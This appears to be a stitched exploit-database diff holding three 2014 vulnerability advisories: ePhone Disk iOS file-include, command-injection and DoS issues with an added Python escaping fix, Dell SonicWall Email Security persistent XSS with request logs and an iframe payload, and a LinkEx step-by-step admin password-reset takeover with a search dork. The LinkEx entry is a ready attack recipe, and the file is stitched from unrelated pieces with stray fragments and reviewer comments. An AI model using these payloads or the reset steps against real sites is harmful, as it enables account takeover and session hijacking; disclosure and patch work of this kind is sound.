The security risk of the arbitrary file upload web vulnerability is estimated as high.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


platforms/hardware/webapps/32560.txt (new file, 269 lines, executable)
@@ -0,0 +1,269 @@

Document Title:
===============
ePhone Disk v1.0.2 iOS - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1230


Release Date:
=============
2014-03-25


Vulnerability Laboratory ID (VL-ID):
====================================
1230


Common Vulnerability Scoring System:
====================================
6.9


Product & Service Introduction:
===============================
ePhone Disk is a lightweight file manager that lets you download, organize, transfer and read your files offline.
It provides the most advanced WiFi sharing features on the market.

SHARE FILES VIA WIFI
- Access the iPhone like a USB drive from a computer; simply use drag and drop to manage files
- Discover nearby devices, and be discoverable by others
- Single tap to connect to nearby devices
- Accessible from any WebDAV client

( Copy of the Homepage: https://itunes.apple.com/us/app/ephone-disk-download-share/id621895613 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2014-03-25: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Easiermobile Inc
Product: ePhone Disk iOS - Download, Share Files via WiFi 1.0.2


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system-specific path
commands to compromise the web-application or mobile device.

The web vulnerability is located in the `filename` value of the `Upload file` module. Remote attackers are able to upload their own files
with a malicious `filename` value in the upload POST request to compromise the mobile web-application. The attack vector is persistent and
the request method is POST. The injected local file/path value is rendered and resolved in the main file dir list (index listing). The
security risk of the local file include web vulnerability is estimated as high(+) with a CVSS (Common Vulnerability Scoring System) count
of 6.8(+)|(-)6.9.

Exploitation of the local file include web vulnerability requires no user interaction but a low-privileged web-application user account.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload File

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Upload File > Index File Dir List (http://localhost:8080)



1.2
A local command/path injection web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
A command injection vulnerability allows attackers to inject local commands via vulnerable system values to compromise the Apple mobile iOS application.

The vulnerability is located in the `foldername` value of the WiFi file dir list module. Local attackers are able to inject their own
system-specific commands or path value requests into the vulnerable foldername value. The injection requires an active sync with the
folders stored in the WiFi app. The injected foldername value is executed on sync in the file dir index list of the main upload path. The
security risk of the local command/path inject vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count
of 6.3(+)|(-)6.4.

Exploitation of the command/path inject vulnerability requires a low-privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system-specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.

Request Method(s):
[+] Sync [POST]

Vulnerable Parameter(s):
[+] foldername (path value)

Affected Module(s):
[+] ./[iPhone]/Sub Category x - File Dir Listing



1.3
A remote denial of service web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
A denial of service vulnerability allows remote attackers to block, freeze or crash the affected or vulnerable mobile online-service application.

The vulnerability is located in the `download` value of the downloads module. Attackers are able to include tags as download path value via
a GET request. The application responds with an unhandled exception and the result is a permanent online-service and application crash. The
security risk of the remote denial of service web vulnerability is estimated as low(+) with a CVSS (Common Vulnerability Scoring System)
count of 1.8(+)|(-)1.9.

Exploitation of the denial of service web vulnerability requires no privileged iOS device account but low user interaction (allow|accept).
Successful exploitation of the DoS vulnerability results in a permanent crash of the mobile iOS application and of its WiFi sharing
online-service.

Request Method(s):
[+] [GET]

Vulnerable Parameter(s):
[+] ?download


Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers with low user interaction and a low-privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.

PoC: Upload File > Name > [Index File Dir List]

<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"/><th class="name">Name</th><th class="modifieddate">Date Modified</th>
<th class="size">Size</th><th/></thead><tbody><tr><td class="icon"><a href=".."><img src="/static/backToParent_icon.png"/></a></td>
<td class="name"><a href="..">Parent Directory</a></td><td class="modifieddate"/><td class="size"/><td/></tr><tr><td class="icon">
<a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">
<img src="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?thumbnail=1"/></a></td>
<td class="name"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png</a></td>
<td class="modifieddate">2014-03-19 14:09</td><td class="size">538 bytes</td>
<td class="download"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?download=1">
download</a></td></tr></tbody></table>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/iPhone/Downloads?upload=1 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content size[0] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/iPhone/Downloads]
Connection[keep-alive]
POST data:
POST_DATA[-----------------------------57142047116429
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png



1.2
The command inject web vulnerability can be exploited by local attackers with low user interaction and a low-privileged web-application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.

PoC: Foldername > Name > [Index File Dir List]

<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"></th><th class="name">Name</th>
<th class="modifieddate">Date Modified</th><th class="size">Size</th><th/></thead><tbody><tr><td class="icon">
<a><img src="/static/GenericFolderIcon.png"/></a></td><td class="name"><a href="/iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]>
[LOCAL COMMAND INJECTION VULNERABILITY!]">iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]</a></td><td class="modifieddate">2014-03-19 14:11</td>
<td class="size">--
</td><td class="download"/></tr></tbody></table>



1.3
The denial of service web vulnerability can be exploited by remote attackers with low user interaction (allow|accept).
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

PoC:
http://localhost:8080/iPhone/Downloads/[FileName].*?download=[REMOTE DENIAL OF SERVICE VULNERABILITY!]

Note: After the device owner accepts the connection the application crashes permanently.
An encoding problem returns an error which results in a crash via memory corruption.



Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure parse of the filename value in the upload file module POST request.
Encode also the filename output value in the file dir index list to prevent injection of malicious context.

1.2
The second vulnerability can be patched by a secure parse of the folder name value in the app sync module POST request.
Encode also the folder name output value in the file dir index list to prevent injection of malicious context.

1.3
Restrict the download value to an integer and validate it before any memory is allocated for the request. Implement an own exception
handling to prevent remote denial of service attacks.



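Added Python example for fixes 1.1 to 1.3 above; it is the editor's own code, not ePhone Disk's. It renders the directory listing rows shown in the PoC sections so that a file or folder name is HTML-escaped for the text node and percent-encoded as a single path segment for the href, and it treats the `?download` value as a strict integer flag. The table markup mirrors the PoC listing; the `Entry` record, the function names and the sample names are constructed for the example.

```python
"""Directory listing renderer that does not reflect raw upload/folder names.

Editor's added example (not ePhone Disk code). It mirrors the <table> rows from
the PoC listings above but escapes every client-controlled name for the HTML
text node, percent-encodes it for the href, and parses ?download= as a strict
integer flag. Entry records and sample names below are constructed.
"""
from dataclasses import dataclass
from html import escape
from urllib.parse import quote


@dataclass
class Entry:
    name: str        # client-controlled: upload filename or synced folder name
    is_dir: bool
    modified: str
    size: str        # already formatted, e.g. "538 bytes"


def entry_href(base_path: str, name: str) -> str:
    """Build the link target so that `name` can only ever be ONE path segment.

    quote(safe="") encodes '/' as %2F, so './x' or 'a/../b' in a name cannot
    climb out of base_path the way the unescaped PoC listing allows.
    """
    parts = [seg for seg in base_path.split("/") if seg] + [name]
    return "/" + "/".join(quote(seg, safe="") for seg in parts)


def render_listing(base_path: str, entries: list) -> str:
    """Return the <tbody> rows for `entries`; all dynamic data is encoded."""
    rows = []
    for e in entries:
        href = entry_href(base_path, e.name)
        href_attr = escape(href, quote=True)          # attribute context
        text = escape(e.name, quote=True)             # text node context
        when = escape(e.modified, quote=True)
        if e.is_dir:
            rows.append(
                '<tr><td class="icon"><img src="/static/GenericFolderIcon.png"/></td>'
                f'<td class="name"><a href="{href_attr}/">{text}</a></td>'
                f'<td class="modifieddate">{when}</td><td class="size">--</td>'
                '<td class="download"/></tr>'
            )
        else:
            thumb_attr = escape(href + "?thumbnail=1", quote=True)
            dl_attr = escape(href + "?download=1", quote=True)
            rows.append(
                f'<tr><td class="icon"><a href="{href_attr}"><img src="{thumb_attr}"/></a></td>'
                f'<td class="name"><a href="{href_attr}">{text}</a></td>'
                f'<td class="modifieddate">{when}</td><td class="size">{escape(e.size)}</td>'
                f'<td class="download"><a href="{dl_attr}">download</a></td></tr>'
            )
    return "\n".join(rows)


def parse_download_flag(raw) -> int:
    """?download= is a boolean switch: accept exactly '0' or '1', reject the rest.

    The advisory's crash comes from tag characters in this value reaching an
    encoder unchecked; refusing anything but the two integers closes that path.
    """
    if raw not in ("0", "1"):
        raise ValueError("download must be 0 or 1")
    return int(raw)


if __name__ == "__main__":
    sample = [
        Entry("./[LOCAL FILE INCLUDE VULNERABILITY!].png", False, "2014-03-19 14:09", "538 bytes"),
        Entry("<img src=x onerror=alert(1)>", True, "2014-03-19 14:11", "--"),
    ]
    print(render_listing("/iPhone/Downloads", sample))
    for value in ("1", "<script>"):
        try:
            print(value, "->", parse_download_flag(value))
        except ValueError as err:
            print(value, "->", err)
```

Two contexts, two encoders: `html.escape` for anything placed into markup, `urllib.parse.quote` with an empty `safe` set for anything placed into a URL path segment. Applying only one of them, or applying it only on input, leaves the listing injectable.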
Security Risk:
==============
1.1
The security risk of the local file include vulnerability is estimated as critical.

1.2
The security risk of the local command inject vulnerability via phone foldername sync is estimated as high.

1.3
The security risk of the remote denial of service vulnerability is estimated as low(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]



platforms/multiple/webapps/32556.txt (new file, 318 lines, executable)
@@ -0,0 +1,318 @@

||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Dell SonicWall EMail Security Appliance Application v7.4.5 - Multiple Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1191
|
||||||
|
|
||||||
|
Dell (SonicWall) Security Bulletin: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-03-26
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1191
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
3.5
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
While most businesses now have some type of anti-spam protection, many must deal with cumbersome
|
||||||
|
management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership.
|
||||||
|
SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL
|
||||||
|
Email Security solutions employ a variety of proven and patented technology designed to block spam and
|
||||||
|
other threats effectively, easily and economically. With innovative protection techniques for both
|
||||||
|
inbound and outbound email plus unique management tools, the Email Security platform delivers superior
|
||||||
|
email protection today—while standing ready to stop the new attacks of tomorrow.
|
||||||
|
|
||||||
|
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software
|
||||||
|
application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a
|
||||||
|
VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a
|
||||||
|
traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization,
|
||||||
|
ease migration and reduce capital costs.
|
||||||
|
|
||||||
|
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-02-07: Researcher Notification & Coordination (Benjamin Kunz Mejri)
|
||||||
|
2014-02-08: Vendor Notification (Dell Security Team)
|
||||||
|
2014-02-14: Vendor Response/Feedback (Dell Security Team)
|
||||||
|
2014-03-25: Vendor Fix/Patch (SonicWall Developer Team)
|
||||||
|
2014-03-26: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
DELL SonicWall
|
||||||
|
Product: EMail Security Appliance Application 7.4.5.1393
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the official Dell SonicWall EMail Security Appliance v7.4.5 Web-Application.
The vulnerabilities allow remote attackers or low privileged user accounts to inject their own malicious script code via POST request to compromise
the application or user session data/information.

The first vulnerability is located in the `filename` value of the `settings_advanced.html` file. Remote attackers and low privileged application user
accounts are able to inject their own malicious script code into the application-side of the `Advanced Settings - Upload Patch > Patch File` module
(German UI: `Patch hochladen > Patch-Datei`). Attackers manipulate the file upload POST request by tampering with the session and exchanging the
file name with a script code payload. In the next step the web application loads the firmware upgrade status page (wait.html), which shows the
file details. The injected script code executes at the location where the file name value is listed. The security risk of the persistent
validation web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.5(-).

The second vulnerability is located in the file name value of the `settings_upload_dlicense.html` file. Remote attackers and low privileged application
user accounts are able to inject their own malicious script code into the application-side of the `License Management - Upload Licenses` module
(German UI: `Lizenz Verwaltung - Lizenzen Upload`). The request method is POST and the attack vector is persistent. The execution occurs in the
exception context (error message) of the license update page module. The security risk of the persistent validation web vulnerability is estimated
as medium with a CVSS (Common Vulnerability Scoring System) count of 3.0(+).

Exploitation of both vulnerabilities requires bypassing the regular input validation of the web application appliance. To bypass the filter remote
attackers can inject two payloads with a split in the middle: the validation encodes the first injected payload, and the second payload after the
split is left unencoded and executes as script code.

Exploitation of the remote web vulnerabilities requires a privileged user account without user interaction, or a remote user with medium to high
user interaction. Successful exploitation of the persistent web vulnerabilities results in session hijacking, persistent external redirects,
persistent phishing and persistent manipulation of vulnerable connected or affected modules.

Request Method:
[+] POST

Vulnerable Module:
[+] Advanced Settings - Upload Patch > Patch File (settings_advanced.html)
[+] License Management - Upload Licenses (settings_upload_dlicense.html)

Vulnerable Parameter(s):
[+] file name

Affected Module(s):
[+] Firmware Update - Waiting Page (wait.html)
[+] License Update Page (exception)

Affected Version(s):
[+] 7.4.5.1393 (resolved in 7.4.6 according to the vendor security bulletin referenced above)

Affected Appliance Model(s):
[+] Dell SonicWall EMail Security Appliance Web Application - All Models


Proof of Concept (PoC):
=======================
The two persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged email security application user account and
low user interaction or without privileged web-application user account on client-side via POST inject. For security demonstration or to reproduce the
vulnerability follow the provided information and steps below.


URL: Input
http://ess.localhost:8619/settings_advanced.html

URL: Execute
http://ess.localhost:8619/wait.html


PoC: Firmware Update - Status Waiting Site

<div style="border-radius: 10px;" class="warning_bubble_content">
<div class="bubble_title">Die Firmware wird aktualisiert...</div>
<div class="bubble_text">
<div id="updaterMessage">
Installationsdateien werden vorbereitet. Starten Sie keine Dienste neu!
<div class="alert">Email Security ist immer noch mit der Verarbeitung von E-Mails beschäftigt.</div>
</div>
<div>Aktuelle Produktversion von Email Security 7.4.5.1393.</div>
<div>Upgrade mit >>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg.</div>
<br>
<div><div class="dotdot lefthand"></div></div>
<div>Abgelaufene Zeit: <span id="updateMS">00:00:36</span></div>
<div id="installProgressText" class="tail_trail"></div>
</div>
</div>


--- PoC Session Logs [POST] ---

Status: 302[Moved Temporarily]
POST http://ess.localhost:8619/settings_advanced.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[text/html]
Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_advanced.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------213272019431414
Content-Disposition: form-data; name="sortFiles"

false
-----------------------------213272019431414
Content-Disposition: form-data; name="smtpBanner"

><><iframe src=http://www.vulnerability-lab.com/> ;)
-----------------------------213272019431414
Content-Disposition: form-data; name="receivedBy"


-----------------------------213272019431414
Content-Disposition: form-data; name="dnsTimeout"

2
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryAgeDays"

10
-----------------------------213272019431414
Content-Disposition: form-data; name="whiteListSelf"

true
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryInbound"

false
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryOutbound"

false
-----------------------------213272019431414
Content-Disposition: form-data; name="logLevel"

fatal
-----------------------------213272019431414
Content-Disposition: form-data; name="dbAging"

366
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpOn"

true
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpComStr"

snwl>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg
-----------------------------213272019431414
Content-Disposition: form-data; name="uploadPatch"; filename=>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg



1.2

URL: Input
http://ess.localhost:8619/settings_dlicense.html

URL: Execute
http://ess.localhost:8619/settings_upload_dlicense.html

--- PoC Session Logs [POST] ---


Status: 200[OK]
POST http://ess.localhost:8619/settings_upload_dlicense.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_upload_dlicense.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D;
JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC; __utma=227649090.1810522928.
1391719457.1391719457.1391719457.1; __utmb=227649090.2.10.1391719457; __utmc=227649090; __utmz=227649090.1391719457.1.
1.utmcsr=esserver.demo.sonicwall.com|utmccn=(referral)|utmcmd=referral|utmcct=/settings_branding.html; __utmv=227649090.|
1=User%3AUnkown=Unknown=1; s_vi=[CS]v1|2979FA11051D0AC5-40000137600ADB77[CE]]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------281841889227097
Content-Disposition: form-data; name="uploadLicenses"; filename=">>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg



Solution - Fix & Patch:
=======================
Both vulnerabilities can be patched by a secure parse and encode of the file name value in the 2 affected upload POST method requests.
Filter and encode also in the wait.html and license exception the vulnerable output values even if the input is still parsed.


SonicWall Solution:
============
We recommend existing users of Dell SonicWALL Email Security upgrade to version 7.4.6 to prevent this cross-site script injection from being executed by unauthorized users.
Email Security 7.4.6 is available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel
in the left-hand navigation, then select “Email Security” in the Software Type drop down menu.


Security Risk:
==============
The security risk of the persistent and non persistent post inject web vulnerabilities are estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

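Review bot: The version fields of this advisory contradict each other and should be reconciled before the file is accepted. "Affected Version(s): [+] 7.4.6" names the same release that the "SonicWall Solution" section tells customers to upgrade to, while the PoC output itself reports "Aktuelle Produktversion von Email Security 7.4.5.1393", so the affected line should read 7.4.5 (tested on build 7.4.5.1393) with 7.4.6 given as the fixed release. Two smaller points in the same file: the "Security Risk" section speaks of "persistent and non persistent post inject web vulnerabilities" although only two persistent issues are documented, and the first multipart PoC carries `filename=>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"` without the opening quote that the second PoC's `filename=">>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"` has, so the first log line should be checked against the captured request. The privilege statements also disagree (the description says "requires a privileged user account without user interaction", the PoC section says "low privileged ... or without privileged web-application user account"); one of the two should be corrected.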
28
platforms/php/webapps/32561.txt
Executable file
@ -0,0 +1,28 @@
# Exploit Title: LinEx All Versions Password Reset Vulnerability
# Google Dork: linkex.dk 2006-2011
# Date: 15/01/2014
# Exploit Author: N B Sri Harsha ( Reconnect Gray hat )
# Vendor Homepage: http://linkex.dk/
# Software Link: http://linkex.dk/releases/linkex.20120508.zip
# Version: All Versions


LinkEx Is A Open Source Web Application For Exchanging link , Which Most
Of The Porn Sites Uses it ,

1) First GO Here http://site.com/linkex/?page=admin
2) Click On Forgot password and enter the captcha
3) Go Here >> site.com/linkex/data/config/config
Note down the " key " parameter
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
5) Thats It U Will Asked For New Username And Password


Shouts to :- | ROHIT ROY | GRAY CODE | Moni HBH | Yamraaj | HALK | Le3to |
HaXarwOw | COSMO | 404 !-!@!2$!-!@ | Root Breaker | N3O | Godhacker |
3QUIVOR | Dmostwanted | r00t.hc0n | hun73r_ihos |

--
Regards
N B Sri Harsha
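Review bot: The writeup never states the weakness that steps 3 and 4 depend on: the reset key generated by the forgot-password step is stored in data/config/config, and that file is readable by any visitor over HTTP (step 3 fetches site.com/linkex/data/config/config with no login), so the secret that gates ?page=resetpassword&key=[key] is exposed to everyone. One sentence naming that, plus the obvious fix (deny web access to data/ or keep the serialized config outside the web root), would make the entry usable; as written it is only a click recipe. Also, the title says "LinEx" while the vendor, dork and software link all say LinkEx (linkex.dk), and "Version: All Versions" is asserted while only the 20120508 release is linked, so the release actually tested should be stated rather than claiming every version.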